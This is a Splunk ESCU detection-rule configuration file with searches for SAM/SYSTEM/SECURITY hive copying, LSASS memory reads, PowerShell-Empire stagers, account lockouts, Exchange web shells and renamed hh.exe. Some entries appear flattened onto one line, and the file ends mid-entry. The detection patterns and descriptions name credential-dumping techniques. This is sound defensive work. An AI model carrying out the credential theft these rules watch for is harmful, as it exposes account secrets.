action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies `copy` or `[System.IO.File]::Copy` being used to capture the SAM, SYSTEM or SECURITY hives identified in the script block. This will catch the most basic use cases for credentials being taken for offline cracking. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Limited false positives as the scope is limited to SAM, SYSTEM and SECURITY hives.
action.escu.creation_date = 2021-07-21
action.escu.modification_date = 2021-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Copy of ShadowCopy with Script Block Logging - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Credential Dumping"]
action.risk = 1
action.risk.param._risk_message = PowerShell was identified running a script to capture the SAM hive on endpoint $ComputerName$ by user $User$.
action.risk.param._risk = [{"risk_object_field": "User", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "ComputerName", "risk_object_type": "system", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Copy of ShadowCopy with Script Block Logging - Rule
action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-36934"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies `copy` or `[System.IO.File]::Copy` being used to capture the SAM, SYSTEM or SECURITY hives identified in the script block. \
This will catch the most basic use cases for credentials being taken for offline cracking. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.notable.param.rule_title = Detect Copy of ShadowCopy with Script Block Logging
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 Message IN ("*copy*","*[System.IO.File]::Copy*") AND Message IN ("*System32\\config\\SAM*", "*System32\\config\\SYSTEM*","*System32\\config\\SECURITY*") | stats count min(_time) as firstTime max(_time) as lastTime by OpCode ComputerName User EventCode Message | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_copy_of_shadowcopy_with_script_block_logging_filter`

[ESCU - Detect Credential Dumping through LSASS access - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects the reading of lsass memory, which is consistent with credential dumping. Reading lsass memory is a common technique used by attackers to steal credentials from the Windows operating system. The detection is made by monitoring Sysmon events and filtering for specific access permissions (0x1010 and 0x1410) on the lsass.exe process, which helps identify potential instances of credential dumping. The detection is important because it suggests that an attacker is attempting to extract credentials from lsass memory, which can lead to unauthorized access, data breaches, and compromise of sensitive information. Credential dumping is often a precursor to further attacks, such as lateral movement, privilege escalation, or data exfiltration. \
False positives can occur due to legitimate actions that involve accessing lsass memory. Therefore, extensive triage and investigation are necessary to differentiate between malicious and benign activities.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects the reading of lsass memory, which is consistent with credential dumping. Reading lsass memory is a common technique used by attackers to steal credentials from the Windows operating system. The detection is made by monitoring Sysmon events and filtering for specific access permissions (0x1010 and 0x1410) on the lsass.exe process, which helps identify potential instances of credential dumping. The detection is important because it suggests that an attacker is attempting to extract credentials from lsass memory, which can lead to unauthorized access, data breaches, and compromise of sensitive information. Credential dumping is often a precursor to further attacks, such as lateral movement, privilege escalation, or data exfiltration. False positives can occur due to legitimate actions that involve accessing lsass memory. Therefore, extensive triage and investigation are necessary to differentiate between malicious and benign activities.
action.escu.how_to_implement = This search needs Sysmon logs and a Sysmon configuration which includes EventCode 10 with lsass.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.
action.escu.known_false_positives = The activity may be legitimate. \
Other tools can access lsass for legitimate reasons, and it's possible this event could be generated in those cases. In these cases, false positives should be fairly obvious and you may need to tweak the search to eliminate noise.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Credential Dumping through LSASS access - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Sysmon"]
action.escu.analytic_story = ["Detect Zerologon Attack", "CISA AA23-347A", "Credential Dumping"]
action.risk = 1
action.risk.param._risk_message = An attempt by $SourceImage$ to read $TargetImage$ was identified on endpoint $dest$; this is indicative of credential dumping and should be investigated.
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "TargetImage", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Credential Dumping through LSASS access - Rule
action.correlationsearch.annotations = {"analytic_story": ["Detect Zerologon Attack", "CISA AA23-347A", "Credential Dumping"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.001", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects the reading of lsass memory, which is consistent with credential dumping. \
Reading lsass memory is a common technique used by attackers to steal credentials from the Windows operating system. The detection is made by monitoring Sysmon events and filtering for specific access permissions (0x1010 and 0x1410) on the lsass.exe process, which helps identify potential instances of credential dumping. The detection is important because it suggests that an attacker is attempting to extract credentials from lsass memory, which can lead to unauthorized access, data breaches, and compromise of sensitive information. Credential dumping is often a precursor to further attacks, such as lateral movement, privilege escalation, or data exfiltration. False positives can occur due to legitimate actions that involve accessing lsass memory. Therefore, extensive triage and investigation are necessary to differentiate between malicious and benign activities.
action.notable.param.rule_title = Detect Credential Dumping through LSASS access
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `sysmon` EventCode=10 TargetImage=*lsass.exe (GrantedAccess=0x1010 OR GrantedAccess=0x1410) | stats count min(_time) as firstTime max(_time) as lastTime by dest, SourceImage, SourceProcessId, TargetImage, TargetProcessId, EventCode, GrantedAccess | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_credential_dumping_through_lsass_access_filter`

[ESCU - Detect Empire with PowerShell Script Block Logging - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. \
Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies the common PowerShell stager used by PowerShell-Empire. Every stager that uses PowerShell follows the same pattern: the initial HTTP request will be base64 encoded and use `system.net.webclient`. Note that some obfuscation may evade the analytic. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies the common PowerShell stager used by PowerShell-Empire. Every stager that uses PowerShell follows the same pattern: the initial HTTP request will be base64 encoded and use `system.net.webclient`. Note that some obfuscation may evade the analytic. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = False positives may only pertain to it not being related to Empire, but another framework. Filter as needed if any applications use the same pattern.
action.escu.creation_date = 2023-04-14
action.escu.modification_date = 2023-04-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Empire with PowerShell Script Block Logging - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = The following behavior was identified and typically related to PowerShell-Empire on $Computer$ by $UserID$.
action.risk.param._risk = [{"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 81}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Empire with PowerShell Script Block Logging - Rule
action.correlationsearch.annotations = {"analytic_story": ["Malicious PowerShell", "Hermetic Wiper", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. \
Dependent upon volume, enable on critical endpoints or all. \
This analytic identifies the common PowerShell stager used by PowerShell-Empire. Every stager that uses PowerShell follows the same pattern: the initial HTTP request will be base64 encoded and use `system.net.webclient`. Note that some obfuscation may evade the analytic. \
During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block.
action.notable.param.rule_title = Detect Empire with PowerShell Script Block Logging
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText=*system.net.webclient* AND ScriptBlockText=*frombase64string*) | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_empire_with_powershell_script_block_logging_filter`

[ESCU - Detect Excessive Account Lockouts From Endpoint - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search identifies endpoints that have caused a relatively high number of account lockouts in a short period.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search identifies endpoints that have caused a relatively high number of account lockouts in a short period.
action.escu.how_to_implement = You must ingest your Windows security event logs into the `Change` datamodel under the nodename `Account_Management` for this search to execute successfully. Please consider updating the cron schedule and the count of lockouts you want to monitor, according to your environment. \
**Splunk>Phantom Playbook Integration** \
If Splunk>Phantom is also configured in your environment, a Playbook called "Excessive Account Lockouts Enrichment and Response" can be configured to run when any results are found by this detection search. The Playbook executes the Contextual and Investigative searches in this Story, conducts additional information gathering on Windows endpoints, and takes a response action to shut down the affected endpoint. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active. \
(Playbook Link: `https://my.phantom.us/4.1/playbook/excessive-account-lockouts-enrichment-and-response/`).
action.escu.known_false_positives = It's possible that a widely used system, such as a kiosk, could cause a large number of account lockouts.
action.escu.creation_date = 2024-03-19
action.escu.modification_date = 2024-03-19
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Excessive Account Lockouts From Endpoint - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Active Directory Password Spraying"]
action.risk = 1
action.risk.param._risk_message = Multiple accounts have been locked out. Review $dest$ and results related to $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 36}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Excessive Account Lockouts From Endpoint - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Password Spraying"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.002"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Changes.user) as user from datamodel=Change.All_Changes where All_Changes.result="*lock*" by All_Changes.dest All_Changes.result | `drop_dm_object_name("All_Changes")` | `drop_dm_object_name("Account_Management")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search count > 5 | `detect_excessive_account_lockouts_from_endpoint_filter`

[ESCU - Detect Excessive User Account Lockouts - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects user accounts that have been locked out a relatively high number of times in a short period.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.003"], "nist": ["DE.AE"]}
action.escu.data_models = ["Change"]
action.escu.eli5 = This search detects user accounts that have been locked out a relatively high number of times in a short period.
action.escu.how_to_implement = ou must ingest your Windows security event logs in the `Change` datamodel under the nodename is `Account_Management`, for this search to execute successfully. Please consider updating the cron schedule and the count of lockouts you want to monitor, according to your environment. action.escu.known_false_positives = It is possible that a legitimate user is experiencing an issue causing multiple account login failures leading to lockouts. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Excessive User Account Lockouts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Password Spraying"] action.risk = 1 action.risk.param._risk_message = Excessive user account lockouts for $user$ in a short period of time action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 36}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Excessive User Account Lockouts - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Password Spraying"], "cis20": ["CIS 10"], "confidence": 60, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from 
datamodel=Change.All_Changes where All_Changes.result="*locked out*" by All_Changes.user All_Changes.result |`drop_dm_object_name("All_Changes")` |`drop_dm_object_name("Account_Management")`| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | search count > 5 | `detect_excessive_user_account_lockouts_filter` [ESCU - Detect Exchange Web Shell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. 
However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1505", "T1505.003", "T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. 
However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` node and `Filesystem` node. action.escu.known_false_positives = The query is structured in a way that `action` (read, create) is not defined. Review the results of this query, filter, and tune as necessary. It may be necessary to generate this query specific to your endpoint product. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Exchange Web Shell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["ProxyNotShell", "ProxyShell", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = A file - $file_name$ was written to disk that is related to IIS exploitation previously performed by HAFNIUM. Review further file modifications on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"risk_object_field": "file_name", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Exchange Web Shell - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyNotShell", "ProxyShell", "CISA AA22-257A", "HAFNIUM Group", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation", "Delivery"], "mitre_attack": ["T1505", "T1505.003", "T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following query identifies suspicious .aspx created in 3 paths identified by Microsoft as known drop locations for Exchange exploitation related to HAFNIUM group and recently disclosed vulnerablity named ProxyShell and ProxyNotShell. Paths include: `\HttpProxy\owa\auth\`, `\inetpub\wwwroot\aspnet_client\`, and `\HttpProxy\OAB\`. Upon triage, the suspicious .aspx file will likely look obvious on the surface. inspect the contents for script code inside. Identify additional log sources, IIS included, to review source and other potential exploitation. It is often the case that a particular threat is only applicable to a specific subset of systems in your environment. Typically analytics to detect those threats are written without the benefit of being able to only target those systems as well. Writing analytics against all systems when those behaviors are limited to identifiable subsets of those systems is suboptimal. Consider the case ProxyShell vulnerability on Microsoft Exchange Servers. 
With asset information, a hunter can limit their analytics to systems that have been identified as Exchange servers. A hunter may start with the theory that the exchange server is communicating with new systems that it has not previously. If this theory is run against all publicly facing systems, the amount of noise it will generate will likely render this theory untenable. However, using the asset information to limit this analytic to just the Exchange servers will reduce the noise allowing the hunter to focus only on the systems where this behavioral change is relevant. action.notable.param.rule_title = Detect Exchange Web Shell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=System by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | join process_guid, _time [| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*\\HttpProxy\\owa\\auth\\*", "*\\inetpub\\wwwroot\\aspnet_client\\*", "*\\HttpProxy\\OAB\\*") Filesystem.file_name IN( "*.aspx", "*.ashx") by _time span=1h Filesystem.user Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | fields _time dest user file_create_time file_name file_path process_name process_path process] | dedup file_create_time | table dest user file_create_time, file_name, file_path, process_name | `detect_exchange_web_shell_filter` [ESCU - Detect HTML Help Renamed - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies 
a renamed instance of hh.exe (HTML Help) executing a Compiled HTML Help (CHM). This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Validate it is the legitimate version of hh.exe by reviewing the PE metadata. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a renamed instance of hh.exe (HTML Help) executing a Compiled HTML Help (CHM). This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Validate it is the legitimate version of hh.exe by reviewing the PE metadata. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely a renamed instance of hh.exe will be used legitimately, filter as needed. action.escu.creation_date = 2022-04-07 action.escu.modification_date = 2022-04-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect HTML Help Renamed - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious Compiled HTML Activity", "Living Off The Land"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect HTML Help Renamed - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Compiled HTML Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events 
relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name!=hh.exe AND Processes.original_file_name=HH.EXE by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_renamed_filter` [ESCU - Detect HTML Help Spawn Child Process - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) that spawns a child process. This particular technique will load Windows script code from a compiled help file. 
CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The "htm" and "html" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review child process events and investigate further. hh.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, some legitimate applications (ex. web browsers) may spawn a child process. Filter as needed. 
